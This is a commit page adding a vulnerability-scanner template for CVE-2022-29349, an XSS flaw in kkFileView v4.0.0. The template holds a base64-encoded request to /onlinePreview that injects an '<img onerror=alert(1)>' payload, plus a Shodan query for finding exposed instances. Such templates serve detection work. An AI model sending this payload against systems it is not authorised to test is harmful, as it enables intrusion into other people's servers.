Create CVE-2022-29349.yaml

patch-1
Arafat Ansari 2022-08-18 16:51:32 +05:30 committed by GitHub
parent b867ed6ef5
commit 1c18fea5e7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 31 additions and 0 deletions

View File

@ -0,0 +1,31 @@
id: CVE-2022-29349
info:
name: kkFileView v4.0.0 - Cross Site Scripting
author: arafatansari
severity: medium
description: |
kkFileView v4.0.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29349
- https://github.com/kekingcn/kkFileView/issues/347
metadata:
shodan-query: http.html:"kkFileView"
verified: "true"
tags: xss,cve,2022
requests:
- raw:
- |
GET /onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- '"><img src=111 onerror=alert(1)>'